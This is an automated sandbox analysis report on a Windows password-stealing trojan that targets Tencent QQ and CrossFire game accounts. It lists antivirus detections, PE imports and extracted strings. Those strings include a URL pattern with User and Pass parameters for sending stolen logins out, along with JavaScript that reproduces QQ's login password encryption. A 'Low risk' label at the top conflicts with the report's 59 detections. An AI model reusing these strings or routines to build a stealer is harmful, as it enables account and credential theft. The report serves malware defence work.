0.9
Low risk

222250ea326ff7909a06ac95f9279154ec02a1913c749bafc1593641249842f5

222250ea326ff7909a06ac95f9279154ec02a1913c749bafc1593641249842f5.exe

Analysis duration

195s

Last analyzed

376 days ago

File size

335.0KB
Static detections Dynamic detections CVE FAMILY METATYPE PLATFORM TYPE UNKNOWN WIN32 TROJAN ULISE
Hawkeye engine
DACN 0.12
FACILE 1.00
IMCLNet 0.67
MFGraph 0.00
Static verdict
Antivirus engines
Engine Result Scan date Engine version
Alibaba None 20190527 0.3.0.5
Avast Win32:PWSX-gen [Trj] 20191231 18.4.3895.0
Baidu Win32.Trojan-PSW.QQPass.ag 20190318 1.0.0.2
CrowdStrike win/malicious_confidence_100% (D) 20190702 1.0
Kingsoft None 20191231 2013.8.14.323
McAfee PWS-FCCD!AA6D114BE601 20191231 6.0.6.653
Tencent Malware.Win32.Gencirc.10b0cc2f 20191231 1.0.0.1
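Static indicators
Behavioral verdict
Dynamic indicators
Network communication
Communicates with hosts for which no DNS query was performed (2 events)
host 114.114.114.114
host 8.8.8.8
File has been identified as malicious by 59 antivirus engines on VirusTotal (50 out of 59 events)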
ALYac Gen:Variant.Ulise.44866
APEX Malicious
AVG Win32:PWSX-gen [Trj]
Acronis suspicious
Ad-Aware Gen:Variant.Ulise.44866
AhnLab-V3 Malware/Win32.Generic.C787466
Antiy-AVL Trojan[Dropper]/Win32.Dinwod.acqn
Arcabit Trojan.Ulise.DAF42
Avast Win32:PWSX-gen [Trj]
Avira TR/Crypt.XPACK.Gen3
Baidu Win32.Trojan-PSW.QQPass.ag
BitDefender Gen:Variant.Ulise.44866
BitDefenderTheta Gen:NN.ZexaF.33558.umX@ayS075o
Bkav W32.AIDetectVM.malware
CAT-QuickHeal Trojan.Qqpass.S3
ClamAV Win.Malware.Razy-6783523-0
Comodo TrojWare.Win32.PSW.QQPass.AK@5rvw8g
CrowdStrike win/malicious_confidence_100% (D)
Cybereason malicious.be6017
Cylance Unsafe
Cyren W32/S-111aedf6!Eldorado
DrWeb Trojan.DownLoader13.44529
ESET-NOD32 a variant of Win32/PSW.QQPass.OVQ
Emsisoft Gen:Variant.Ulise.44866 (B)
Endgame malicious (high confidence)
F-Prot W32/S-111aedf6!Eldorado
F-Secure Trojan.TR/Crypt.XPACK.Gen3
FireEye Generic.mg.aa6d114be601753a
Fortinet W32/GameHack.AX!tr
GData Gen:Variant.Ulise.44866
Ikarus Trojan.Win32.PSW
Invincea heuristic
Jiangmin Trojan/Scar.bexl
K7AntiVirus Password-Stealer ( 004b6c701 )
K7GW Password-Stealer ( 004b6c701 )
Kaspersky Trojan.Win32.Scar.izkq
MAX malware (ai score=86)
MaxSecure Trojan.Malware.300983.susgen
McAfee PWS-FCCD!AA6D114BE601
McAfee-GW-Edition BehavesLike.Win32.PWSZbot.fh
MicroWorld-eScan Gen:Variant.Ulise.44866
Microsoft PWS:Win32/QQPass.GP
NANO-Antivirus Trojan.Win32.QQPass.dqxdis
Panda Trj/Genetic.gen
Qihoo-360 HEUR/QVM20.1.3F61.Malware.Gen
Rising Trojan.Kryptik!1.B3E8 (CLASSIC)
Sangfor Malware
SentinelOne DFI - Malicious PE
Sophos Mal/Emogen-P
Symantec ML.Attribute.HighConfidence
Runtime screenshots
No runtime screenshots available. No screenshots were generated while this sample was running.

PE Compile Time

2015-04-17 23:00:27

PE Imphash

392f54ef7b2fcf975417f1d446b7c28c

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x000472d6 0x00047400 5.858782550469609
.rdata 0x00049000 0x00001b5a 0x00001c00 4.392157049408466
.data 0x0004b000 0x00016688 0x0000a600 6.101728008507946

Imports

Library KERNEL32.DLL:
0x449088 LocalSize
0x449090 MultiByteToWideChar
0x449094 WideCharToMultiByte
0x449098 MulDiv
0x44909c GlobalUnlock
0x4490a0 RtlMoveMemory
0x4490a4 GlobalFree
0x4490a8 GlobalLock
0x4490ac GlobalAlloc
0x4490b0 Module32First
0x4490b4 GetCurrentProcessId
0x4490b8 CancelWaitableTimer
0x4490bc SetWaitableTimer
0x4490c4 TerminateProcess
0x4490c8 OpenProcess
0x4490cc Process32Next
0x4490d4 CloseHandle
0x4490d8 Process32First
0x4490e0 GetModuleFileNameA
0x4490e4 TerminateThread
0x4490e8 LCMapStringA
0x4490ec LoadLibraryA
0x4490f0 GetProcAddress
0x4490f4 FreeLibrary
0x4490f8 GetTickCount
0x4490fc GetUserDefaultLCID
0x449104 lstrlenW
0x449108 WriteFile
0x44910c DeleteFileA
0x449110 CreateFileA
0x449114 GetFileSize
0x449118 ReadFile
0x44911c IsBadReadPtr
0x449120 HeapReAlloc
0x449124 ExitProcess
0x449128 GlobalSize
0x44912c HeapAlloc
0x449130 HeapFree
0x449134 GetProcessHeap
0x449138 GetModuleHandleA
Library ADVAPI32.dll:
0x449000 RegOpenKeyA
0x449004 RegQueryValueExA
0x449008 RegCloseKey
Library ATL.DLL:
0x449010 None
0x449014 None
0x449018 None
0x44901c None
Library GDI32.dll:
0x449024 BitBlt
0x449028 StretchBlt
0x44902c GetPixel
0x449030 GetStockObject
0x449034 GetObjectA
0x449038 CreateCompatibleDC
0x44903c CreateDIBSection
0x449040 DeleteDC
0x449044 CombineRgn
0x449048 CreateRoundRectRgn
0x44904c CreateSolidBrush
0x449050 CreatePatternBrush
0x449058 SetTextColor
0x44905c SetBkMode
0x449060 SetBkColor
0x449064 FillRgn
0x449068 FrameRgn
0x44906c DeleteObject
0x449070 Rectangle
0x449074 SelectObject
0x449078 CreateFontA
0x44907c ExtCreateRegion
0x449080 GetDeviceCaps
Library gdiplus.dll:
0x4493dc GdipDrawImageRect
0x4493e4 GdipDeleteGraphics
0x4493f0 GdipDeleteBrush
0x4493f4 GdipCreateSolidFill
0x449414 GdipDisposeImage
0x449418 GdiplusStartup
0x44941c GdipCreateFromHDC
0x449420 GdipDrawRectangleI
0x449424 GdipDrawRectangle
Library MSIMG32.dll:
0x449140 TransparentBlt
0x449144 AlphaBlend
Library MSVCRT.dll:
0x44914c strncmp
0x449150 sprintf
0x449154 tolower
0x449158 strncpy
0x44915c ??3@YAXPAX@Z
0x449160 atoi
0x449164 _ftol
0x449168 strrchr
0x44916c ??2@YAPAXI@Z
0x449170 floor
0x449174 strchr
0x449178 srand
0x44917c rand
0x449180 strtod
0x449184 _CIfmod
0x449188 modf
0x44918c memmove
0x449190 free
0x449194 malloc
0x449198 _strnicmp
Library ole32.dll:
0x449448 CoUninitialize
0x44944c CLSIDFromString
0x449450 StringFromGUID2
0x449458 OleRun
0x44945c CoCreateInstance
0x449460 CLSIDFromProgID
0x449464 CoInitialize
Library OLEAUT32.dll:
0x4491a0 LHashValOfNameSys
0x4491a4 VarR8FromCy
0x4491a8 VarR8FromBool
0x4491ac LoadTypeLib
0x4491b0 RegisterTypeLib
0x4491b4 SafeArrayCreate
0x4491b8 VariantChangeType
0x4491bc VariantInit
0x4491c0 SafeArrayDestroy
0x4491c4 SysAllocString
0x4491c8 VariantClear
0x4491cc SafeArrayGetDim
0x4491d0 SafeArrayGetLBound
0x4491d4 SafeArrayGetUBound
0x4491d8 SafeArrayAccessData
0x4491e4 OleLoadPicture
Library SHELL32.dll:
0x4491ec DragQueryFileA
0x4491f0 DragAcceptFiles
0x4491f4 Shell_NotifyIconA
0x4491f8 DragFinish
0x4491fc ShellExecuteA
Library SHLWAPI.dll:
0x449204 PathFileExistsA
Library USER32.dll:
0x44920c SetActiveWindow
0x449210 UnregisterHotKey
0x449214 RegisterHotKey
0x44921c DrawMenuBar
0x449220 SetMenu
0x449224 GetMenu
0x449228 GetSystemMetrics
0x44922c IsZoomed
0x449230 IsIconic
0x449234 RegisterClassExA
0x449238 FillRect
0x44923c SetClassLongA
0x449240 GetClassLongA
0x449244 SetRect
0x449248 SetWindowRgn
0x44924c LoadMenuA
0x449250 DrawIcon
0x449254 DrawIconEx
0x449258 GetIconInfo
0x44925c DrawTextA
0x449260 CreateMenu
0x449264 GetDesktopWindow
0x449268 GetWindow
0x449270 IsWindowVisible
0x449274 CreatePopupMenu
0x449278 GetSysColor
0x44927c GetWindowTextA
0x449280 GetWindowLongA
0x449284 SetWindowLongA
0x44928c CopyImage
0x449290 CopyIcon
0x449294 GetDC
0x449298 ReleaseDC
0x44929c GetMessageA
0x4492a0 GetParent
0x4492a8 IsDialogMessageA
0x4492ac DestroyMenu
0x4492b0 AppendMenuA
0x4492b4 GetMenuItemCount
0x4492b8 InsertMenuA
0x4492bc SetMenuInfo
0x4492c0 GetSubMenu
0x4492c4 GetMenuItemID
0x4492c8 CheckMenuRadioItem
0x4492cc SetForegroundWindow
0x4492d0 TrackPopupMenu
0x4492d4 GetMenuStringA
0x4492d8 GetMenuItemInfoA
0x4492dc GetMenuItemRect
0x4492e0 GetMenuState
0x4492e4 GetMenuInfo
0x4492e8 GetMenuDefaultItem
0x4492ec MenuItemFromPoint
0x4492f0 RemoveMenu
0x4492f4 CheckMenuItem
0x4492f8 wsprintfA
0x4492fc SetMenuItemInfoA
0x449300 SetMenuItemBitmaps
0x449304 SetMenuDefaultItem
0x449308 PeekMessageA
0x44930c GetSystemMenu
0x449310 RemovePropA
0x449314 GetPropA
0x449318 SetPropA
0x44931c MessageBoxA
0x449320 SetWindowTextA
0x449328 EnableWindow
0x44932c IsWindowEnabled
0x449330 ShowWindow
0x449334 SetParent
0x449338 PostMessageA
0x44933c SetWindowPos
0x449340 MoveWindow
0x449344 UpdateWindow
0x449348 ValidateRect
0x44934c InvalidateRect
0x449350 ScreenToClient
0x449354 GetWindowRect
0x449358 GetFocus
0x44935c SetFocus
0x449360 GetDlgItem
0x449364 CreateWindowExA
0x449368 DestroyCursor
0x44936c PostQuitMessage
0x449370 DestroyIcon
0x449374 TrackMouseEvent
0x449378 SetCursor
0x44937c LoadCursorA
0x449380 DefMDIChildProcA
0x449384 SendMessageA
0x449388 TranslateMessage
0x44938c DispatchMessageA
0x449390 IsWindow
0x449394 GetClassNameA
0x449398 BeginPaint
0x44939c EndPaint
0x4493a0 CallWindowProcA
0x4493a4 GetAsyncKeyState
0x4493a8 GetClientRect
0x4493ac DestroyWindow
0x4493b0 DefWindowProcA
Library WININET.dll:
0x4493bc HttpQueryInfoA
0x4493c0 InternetReadFile
0x4493c4 HttpSendRequestA
0x4493c8 HttpOpenRequestA
0x4493cc InternetConnectA
0x4493d0 InternetCloseHandle
0x4493d4 InternetOpenA

KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
gdiplus.dll
MSIMG32.dll
MSVCRT.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
LocalSize
GetWindowsDirectoryA
MultiByteToWideChar
WideCharToMultiByte
MulDiv
GlobalUnlock
RtlMoveMemory
GlobalFree
GlobalLock
GlobalAlloc
Module32First
GetCurrentProcessId
CancelWaitableTimer
SetWaitableTimer
CreateWaitableTimerA
TerminateProcess
OpenProcess
Process32Next
GetPrivateProfileStringA
CloseHandle
Process32First
CreateToolhelp32Snapshot
GetModuleFileNameA
TerminateThread
LCMapStringA
LoadLibraryA
GetProcAddress
FreeLibrary
GetTickCount
GetUserDefaultLCID
WritePrivateProfileStringA
lstrlenW
WriteFile
DeleteFileA
CreateFileA
GetFileSize
ReadFile
IsBadReadPtr
HeapReAlloc
ExitProcess
GlobalSize
HeapAlloc
HeapFree
GetProcessHeap
GetModuleHandleA
RegOpenKeyA
RegQueryValueExA
RegCloseKey
BitBlt
StretchBlt
GetPixel
GetStockObject
GetObjectA
CreateCompatibleDC
CreateDIBSection
DeleteDC
CombineRgn
CreateRoundRectRgn
CreateSolidBrush
CreatePatternBrush
CreateCompatibleBitmap
SetTextColor
SetBkMode
SetBkColor
FillRgn
FrameRgn
DeleteObject
Rectangle
SelectObject
CreateFontA
ExtCreateRegion
GetDeviceCaps
GdipDrawImageRect
GdipGetImageDimension
GdipDeleteGraphics
GdipLoadImageFromStream
GdipImageSelectActiveFrame
GdipDeleteBrush
GdipCreateSolidFill
GdipCreateBitmapFromHBITMAP
GdipGetImageRawFormat
GdipSaveImageToStream
GdipGetImageEncoders
GdipGetImageEncodersSize
GdipCreateBitmapFromStream
GdipCreateBitmapFromStreamICM
GdipDisposeImage
GdiplusStartup
GdipCreateFromHDC
GdipDrawRectangleI
GdipDrawRectangle
GdipGetTextRenderingHint
GdipSetTextRenderingHint
GdipGetSmoothingMode
GdipSetSmoothingMode
GdipGetImageGraphicsContext
GdipSetWorldTransform
TransparentBlt
AlphaBlend
strncmp
sprintf
tolower
strncpy
??3@YAXPAX@Z
strrchr
??2@YAPAXI@Z
strchr
strtod
_CIfmod
memmove
malloc
_strnicmp
CreateStreamOnHGlobal
CoUninitialize
CLSIDFromString
StringFromGUID2
GetHGlobalFromStream
OleRun
CoCreateInstance
CLSIDFromProgID
CoInitialize
DragQueryFileA
DragAcceptFiles
Shell_NotifyIconA
DragFinish
ShellExecuteA
PathFileExistsA
SetActiveWindow
UnregisterHotKey
RegisterHotKey
RegisterWindowMessageA
DrawMenuBar
SetMenu
GetMenu
GetSystemMetrics
IsZoomed
IsIconic
RegisterClassExA
FillRect
SetClassLongA
GetClassLongA
SetRect
SetWindowRgn
LoadMenuA
DrawIcon
DrawIconEx
GetIconInfo
DrawTextA
CreateMenu
GetDesktopWindow
GetWindow
GetWindowThreadProcessId
IsWindowVisible
CreatePopupMenu
GetSysColor
GetWindowTextA
GetWindowLongA
SetWindowLongA
SetLayeredWindowAttributes
CopyImage
CopyIcon
ReleaseDC
GetMessageA
GetParent
TranslateAcceleratorA
IsDialogMessageA
DestroyMenu
AppendMenuA
GetMenuItemCount
InsertMenuA
SetMenuInfo
GetSubMenu
GetMenuItemID
CheckMenuRadioItem
SetForegroundWindow
TrackPopupMenu
GetMenuStringA
GetMenuItemInfoA
GetMenuItemRect
GetMenuState
GetMenuInfo
GetMenuDefaultItem
MenuItemFromPoint
RemoveMenu
CheckMenuItem
wsprintfA
SetMenuItemInfoA
SetMenuItemBitmaps
SetMenuDefaultItem
PeekMessageA
GetSystemMenu
RemovePropA
GetPropA
SetPropA
MessageBoxA
SetWindowTextA
GetWindowTextLengthA
EnableWindow
IsWindowEnabled
ShowWindow
SetParent
PostMessageA
SetWindowPos
MoveWindow
UpdateWindow
ValidateRect
InvalidateRect
ScreenToClient
GetWindowRect
GetFocus
SetFocus
GetDlgItem
CreateWindowExA
DestroyCursor
PostQuitMessage
DestroyIcon
TrackMouseEvent
SetCursor
LoadCursorA
DefMDIChildProcA
SendMessageA
TranslateMessage
DispatchMessageA
IsWindow
GetClassNameA
BeginPaint
EndPaint
CallWindowProcA
GetAsyncKeyState
GetClientRect
DestroyWindow
DefWindowProcA
MsgWaitForMultipleObjects
HttpQueryInfoA
InternetReadFile
HttpSendRequestA
HttpOpenRequestA
InternetConnectA
InternetCloseHandle
InternetOpenA
CrackMe
Sysceam
crossfire.exe
Client.exe
TASLogin.exe
TenioDL.exe
Syscaem
http://i2.tietuku.com/e8f28e466c583ca1.jpg
cpath.ini
wb.dat
User-Agent:
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP/1.1
Referer:
Referer:
Referer:
Accept:
Accept: */*
Accept-Language:
Accept-Language: zh-cn
Content-Type:
Content-Type: application/x-www-form-urlencoded
Cookie:
Location:
Set-Cookie
Set-Cookie:
@ Moved
HTTP/1.1
https://
http://
?=deleted
Software\Tencent\CrossFire\InstallPath
Software\Tencent\CrossFire\Path
c1.dat
gIoMoMqKvDkBjCvItKrMkA9KAUrIeKtMkA9KiMlAbKnMbIcKhEaInKgEiIqKbM
c2.dat
\TCLS\music\1.html
<embed autoplay="true" src="sound.mp3" width="1" height="1" />
http://cf.qq.com/other/cilent/index2.shtml
\TCLS\config\LoginQ.dat
LastQQUin
Public
Verdana
Wingdings
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz
<@gIpNoMsMvDlAhEtIpK9MqIiCtMyIlKkK9MkArKtMkA9KjMlIjC
nickname : '
&Level=30&ToKen=%B5%C7%C2%BC%B1%A3%BB%A4%5BNO%5D%B6%FE%BC%B6%C3%DC%C2%EB%5BNO%5D&Beta=20150417
&Pass=
&User=
?Action=AddUser&Server=
http://www.baidu.com/
\TCLS\Client.exe
http://ui.ptlogin2.qq.com/cgi-bin/login?link_target=blank&appid=12000101&s_url=http://kf.qq.com/other/for_your_service.shtml
login_sig:"
&u1=http%3A%2F%2Faq.qq.com%2Fcn2%2Findex&r=
&appid=2001601&js_ver=10120&js_type=0&login_sig=
https://ssl.ptlogin2.qq.com/check?uin=
&u1=http%3A%2F%2Fkf.qq.com%2Fgame%2Fbusiness.html%3Fcode%3Ddnf&r=
&appid=12000101&js_ver=10120&js_type=1&login_sig=
http://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=0&uin=
'([\s\S]*?)'
ptvfsession=
ScriptControl
JScript
Language
function time(){return Math.random()}
ExecuteStatement
@o@{B96B3CAE-0728-11D3-9D7B-0000F81EF32E}
&aid=12000101&cap_cd=
http://captcha.qq.com/getimage?uin=
if(aH!=null){aG.drShiftTo(aM,aH);if(z!=aJ){au.ZERO.subTo(aH,aH)}}
aG.t=aM;aG.clamp();if(aP>0){aG.rShiftTo(aP,aG)}
if(z<0){au.ZERO.subTo(aG,aG)}}
function P(t){var z=j();this.abs().divRemTo(t,null,z);if(this.s<0&&z.compareTo(au.ZERO)>0){t.subTo(z,z)}
return z}
function M(t){this.m=t}
function X(t){if(t.s<0||t.compareTo(this.m)>=0){return t.mod(this.m)}else{return t}}
function am(t){return t}
function L(t){t.divRemTo(this.m,null,t)}
function J(t,aC,z){t.multiplyTo(aC,z);this.reduce(z)}
function aw(t,z){t.squareTo(z);this.reduce(z)}
M.prototype.convert=X;M.prototype.revert=am;M.prototype.reduce=L;M.prototype.mulTo=J;M.prototype.sqrTo=aw;function D(){if(this.t<1){return 0}
var t=this[0];if((t&1)==0){return 0}
var z=t&3;z=(z*(2-(t&15)*z))&15;z=(z*(2-(t&255)*z))&255;z=(z*(2-(((t&65535)*z)&65535)))&65535;z=(z*(2-t*z%this.DV))%this.DV;return(z>0)?this.DV-z:-z}
function g(t){this.m=t;this.mp=t.invDigit();this.mpl=this.mp&32767;this.mph=this.mp>>15;this.um=(1<<(t.DB-15))-1;this.mt2=2*t.t}
function al(t){var z=j();t.abs().dlShiftTo(this.m.t,z);z.divRemTo(this.m,null,z);if(t.s<0&&z.compareTo(au.ZERO)>0){this.m.subTo(z,z)}
return z}
function av(t){var z=j();t.copyTo(z);this.reduce(z);return z}
function R(t){while(t.t<=this.mt2){t[t.t++]=0}
for(var aC=0;aC<this.m.t;++aC){var z=t[aC]&32767;var aD=(z*this.mpl+(((z*this.mph+(t[aC]>>15)*this.mpl)&this.um)<<15))&t.DM;z=aC+this.m.t;t[z]+=this.m.am(0,aD,t,aC,0,this.m.t);while(t[z]>=t.DV){t[z]-=t.DV;t[++z]++}}
t.clamp();t.drShiftTo(this.m.t,t);if(t.compareTo(this.m)>=0){t.subTo(this.m,t)}}
function ao(t,z){t.squareTo(z);this.reduce(z)}
function B(t,aC,z){t.multiplyTo(aC,z);this.reduce(z)}
g.prototype.convert=al;g.prototype.revert=av;g.prototype.reduce=R;g.prototype.mulTo=B;g.prototype.sqrTo=ao;function k(){return((this.t>0)?(this[0]&1):this.s)==0}
function A(aH,aI){if(aH>4294967295||aH<1){return au.ONE}
var aG=j(),aC=j(),aF=aI.convert(this),aE=l(aH)-1;aF.copyTo(aG);while(--aE>=0){aI.sqrTo(aG,aC);if((aH&(1<<aE))>0){aI.mulTo(aC,aF,aG)}else{var aD=aG;aG=aC;aC=aD}}
return aI.revert(aG)}
function ap(aC,t){var aD;if(aC<256||t.isEven()){aD=new M(t)}else{aD=new g(t)}
return this.exp(aC,aD)}
au.prototype.copyTo=aa;au.prototype.fromInt=p;au.prototype.fromString=y;au.prototype.clamp=Q;au.prototype.dlShiftTo=at;au.prototype.drShiftTo=Z;au.prototype.lShiftTo=v;au.prototype.rShiftTo=n;au.prototype.subTo=ad;au.prototype.multiplyTo=F;au.prototype.squareTo=S;au.prototype.divRemTo=G;au.prototype.invDigit=D;au.prototype.isEven=k;au.prototype.exp=A;au.prototype.toString=s;au.prototype.negate=T;au.prototype.abs=an;au.prototype.compareTo=I;au.prototype.bitLength=w;au.prototype.mod=P;au.prototype.modPowInt=ap;au.ZERO=c(0);au.ONE=c(1);var o;var W;var ae;function d(t){W[ae++]^=t&255;W[ae++]^=(t>>8)&255;W[ae++]^=(t>>16)&255;W[ae++]^=(t>>24)&255;if(ae>=O){ae-=O}}
function V(){d(new Date().getTime())}
if(W==null){W=new Array();ae=0;var K;if(navigator.appName=='Netscape'&&navigator.appVersion<'5'&&window.crypto&&window.crypto.random){var H=window.crypto.random(32);for(K=0;K<H.length;++K){W[ae++]=H.charCodeAt(K)&255}}
while(ae<O){K=Math.floor(65536*Math.random());W[ae++]=K>>>8;W[ae++]=K&255}
ae=0;V()}
function E(){if(o==null){V();o=aq();o.init(W);for(ae=0;ae<W.length;++ae){W[ae]=0}
return o.next()}
function ax(z){var t;for(t=0;t<z.length;++t){z[t]=E()}}
function af(){}
af.prototype.nextBytes=ax;function m(){this.i=0;this.j=0;this.S=new Array()}
function f(aE){var aD,z,aC;for(aD=0;aD<256;++aD){this.S[aD]=aD}
z=0;for(aD=0;aD<256;++aD){z=(z+this.S[aD]+aE[aD%aE.length])&255;aC=this.S[aD];this.S[aD]=this.S[z];this.S[z]=aC}
this.i=0;this.j=0}
function a(){var z;this.i=(this.i+1)&255;this.j=(this.j+this.S[this.i])&255;z=this.S[this.i];this.S[this.i]=this.S[this.j];this.S[this.j]=z;return this.S[(z+this.S[this.i])&255]}
m.prototype.init=f;m.prototype.next=a;function aq(){return new m()}
var O=256;function U(aD,aC,z){aC='F20CE00BAE5361F8FA3AE9CEFA495362FF7DA1BA628F64A347F0A8C012BF0B254A30CD92ABFFE7A6EE0DC424CB6166F8819EFA5BCCB20EDFB4AD02E412CCF579B1CA711D55B8B0B3AEB60153D5E0693A2A86F3167D7847A0CB8B00004716A9095D9BADC977CBB804DBDCBA6029A9710869A453F27DFDDF83C016D928B3CBF4C7';z='3';var t=new N();t.setPublic(aC,z);return t.encrypt(aD)}
return{rsa_encrypt:U}}();var s=window||{};(function(s){var t='',a=0,h=[],y=[],z=0,v=0,n=[],u=[],o=true;function f(){return Math.round(Math.random()*4294967295)}
function k(D,E,A){if(!A||A>4){A=4}
var B=0;for(var C=E;C<E+A;C++){B<<=8;B|=D[C]}
return(B&4294967295)>>>0}
function b(B,C,A){B[C+3]=(A>>0)&255;B[C+2]=(A>>8)&255;B[C+1]=(A>>16)&255;B[C+0]=(A>>24)&255}
function x(D){if(!D){return''}
var A='';for(var B=0;B<D.length;B++){var C=Number(D[B]).toString(16);if(C.length==1){C='0'+C}
return A}
function w(B){var C='';for(var A=0;A<B.length;A+=2){C+=String.fromCharCode(parseInt(B.substr(A,2),16))}
return C}
function c(C){if(!C){return''}
var B=[];for(var A=0;A<C.length;A++){B[A]=C.charCodeAt(A)}
return x(B)}
function j(C){h=new Array(8);y=new Array(8);z=v=0;o=true;a=0;var A=C.length;var D=0;a=(A+10)%8;if(a!=0){a=8-a}
n=new Array(A+a+10);h[0]=((f()&248)|a)&255;for(var B=1;B<=a;B++){h[B]=f()&255}
a++;for(var B=0;B<8;B++){y[B]=0}
D=1;while(D<=2){if(a<8){h[a++]=f()&255;D++}
if(a==8){q()}}
var B=0;while(A>0){if(a<8){h[a++]=C[B++];A--}
if(a==8){q()}}
D=1;while(D<=7){if(a<8){h[a++]=0;D++}
if(a==8){q()}}
return n}
function r(E){var D=0;var B=new Array(8);var A=E.length;u=E;if(A%8!=0||A<16){return null}
y=m(E);a=y[0]&7;D=A-a-10;if(D<0){return null}
for(var C=0;C<B.length;C++){B[C]=0}
n=new Array(D);v=0;z=8;a++;var F=1;while(F<=2){if(a<8){a++;F++}
if(a==8){B=E;if(!g()){return null}}}
var C=0;while(D!=0){if(a<8){n[C]=(B[v+a]^y[a])&255;C++;D--;a++}
if(a==8){B=E;v=z-8;if(!g()){return null}}}
for(F=1;F<8;F++){if(a<8){if((B[v+a]^y[a])!=0){return null}
if(a==8){B=E;v=z;if(!g()){return null}}}
return n}
function q(){for(var A=0;A<8;A++){if(o){h[A]^=y[A]}else{h[A]^=n[v+A]}}
var B=l(h);for(var A=0;A<8;A++){n[z+A]=B[A]^y[A];y[A]=h[A]}
v=z;z+=8;a=0;o=false}
function l(A){var B=16;var G=k(A,0,4);var F=k(A,4,4);var I=k(t,0,4);var H=k(t,4,4);var E=k(t,8,4);var D=k(t,12,4);var C=0;var J=2654435769>>>0;while(B-->0){C+=J;C=(C&4294967295)>>>0;G+=((F<<4)+I)^(F+C)^((F>>>5)+H);G=(G&4294967295)>>>0;F+=((G<<4)+E)^(G+C)^((G>>>5)+D);F=(F&4294967295)>>>0}
var K=new Array(8);b(K,0,G);b(K,4,F);return K}
function m(A){var B=16;var G=k(A,0,4);var F=k(A,4,4);var I=k(t,0,4);var H=k(t,4,4);var E=k(t,8,4);var D=k(t,12,4);var C=3816266640>>>0;var J=2654435769>>>0;while(B-->0){F-=((G<<4)+E)^(G+C)^((G>>>5)+D);F=(F&4294967295)>>>0;G-=((F<<4)+I)^(F+C)^((F>>>5)+H);G=(G&4294967295)>>>0;C-=J;C=(C&4294967295)>>>0}
var K=new Array(8);b(K,0,G);b(K,4,F);return K}
function g(){var A=u.length;for(var B=0;B<8;B++){y[B]^=u[z+B]}
y=m(y);z+=8;a=0;return true}
function p(E,D){var C=[];if(D){for(var B=0;B<E.length;B++){C[B]=E.charCodeAt(B)&255}}else{var A=0;for(var B=0;B<E.length;B+=2){C[A++]=parseInt(E.substr(B,2),16)}}
return C}
s.TEA={encrypt:function(D,C){var B=p(D,C);var A=j(B);return x(A)},enAsBase64:function(F,E){var D=p(F,E);var C=j(D);var A='';for(var B=0;B<C.length;B++){A+=String.fromCharCode(C[B])}
return d.encode(A)},decrypt:function(C){var B=p(C,false);var A=r(B);return x(A)},initkey:function(A,B){t=p(A,B)},bytesToStr:w,strToBytes:c,bytesInStr:x,dataFromStr:p};var d={};d.PADCHAR='=';d.ALPHA='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';d.getbyte=function(C,B){var A=C.charCodeAt(B);if(A>255){throw'INVALID_CHARACTER_ERR: DOM Exception 5'}
return A};d.encode=function(E){if(arguments.length!=1){throw'SyntaxError: Not enough arguments'}
var B=d.PADCHAR;var G=d.ALPHA;var F=d.getbyte;var D,H;var A=[];E=''+E;var C=E.length-E.length%3;if(E.length==0){return E}
for(D=0;D<C;D+=3){H=(F(E,D)<<16)|(F(E,D+1)<<8)|F(E,D+2);A.push(G.charAt(H>>18));A.push(G.charAt((H>>12)&63));A.push(G.charAt((H>>6)&63));A.push(G.charAt(H&63))}
switch(E.length-C){case 1:H=F(E,D)<<16;A.push(G.charAt(H>>18)+G.charAt((H>>12)&63)+B+B);break;case 2:H=(F(E,D)<<16)|(F(E,D+1)<<8);A.push(G.charAt(H>>18)+G.charAt((H>>12)&63)+G.charAt((H>>6)&63)+B);break}
return A.join('')};if(!window.btoa){window.btoa=d.encode}})(window);function uin2hex(str){var maxLength=16;str=parseInt(str);var hex=str.toString(16);var len=hex.length;for(var i=len;i<maxLength;i++){hex='0'+hex}
var arr=[];for(var j=0;j<maxLength;j+=2){arr.push('\\x'+hex.substr(j,2))}
var result=arr.join('');eval('result="'+result+'"');return result}
function jm(p,u,c){var pwd=md5(p),h1=hexchar2bin(pwd),salt=uin2hex(u),s2=md5(h1+salt),rsaH1=$.RSA.rsa_encrypt(h1),rsaH1Len=(rsaH1.length/2).toString(16),hexVcode=s.TEA.strToBytes(c.toUpperCase()),vcodeLen='000'+c.length.toString(16);while(rsaH1Len.length<4){rsaH1Len='0'+rsaH1Len}
s.TEA.initkey(s2);var saltPwd=s.TEA.enAsBase64(rsaH1Len+rsaH1+s.TEA.strToBytes(salt)+vcodeLen+hexVcode);s.TEA.initkey('');__monitor(488358,1);return saltPwd.replace(/[\/\+=]/g,function(a){return{'/':'-','+':'*','=':'_'}
[a]})}

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 53179 224.0.0.252 5355
192.168.56.101 49642 224.0.0.252 5355
192.168.56.101 137 192.168.56.255 137
192.168.56.101 61714 114.114.114.114 53
192.168.56.101 61714 8.8.8.8 53
192.168.56.101 56933 8.8.8.8 53
192.168.56.101 138 192.168.56.255 138
192.168.56.101 58485 114.114.114.114 53
192.168.56.101 57665 114.114.114.114 53

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.